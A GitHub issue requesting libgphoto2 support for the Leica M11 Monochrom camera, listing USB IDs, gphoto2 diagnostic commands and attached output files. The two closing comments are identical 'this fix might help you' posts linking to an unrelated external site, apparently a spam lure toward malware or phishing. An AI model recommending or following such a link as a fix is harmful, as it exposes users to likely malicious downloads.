gphoto/libgphoto2 #1098: New Camera: Leica M11 (Monochrom)

crawfordlong, 2025-03-05:
Fill in fields below. If you don't know how, leave it free.

**Name of the camera*

Leica M11 Monochrom

**USB IDs**

ID 1a98:2083 Leica Camera AG LEICA M11 Monochrom

**camera summary output**
run

  gphoto2 --summary > summary.txt

[summary.txt](https://github.com/user-attachments/files/19096358/summary.txt)

**camera configuration output**

gphoto2 --list-all-config > list-all-config.txt

[list-all-config.txt](https://github.com/user-attachments/files/19096359/list-all-config.txt)

**test capture**

test if capture perhaps already works:

  gphoto2 --capture-image-and-download -- 

[capture-image.txt](https://github.com/user-attachments/files/19096362/capture-image.txt)
  
  gphoto2 --capture-preview

[capture-preview.txt](https://github.com/user-attachments/files/19096374/capture-preview.txt)

 --

DomesticFemBoy, 2025-04-12:
This fix in another issue and it might help you [click](https://newrides.es/captha/)

Domestos2281337, 2025-04-12:
This fix in another issue and it might help you [click](https://newrides.es/captha/)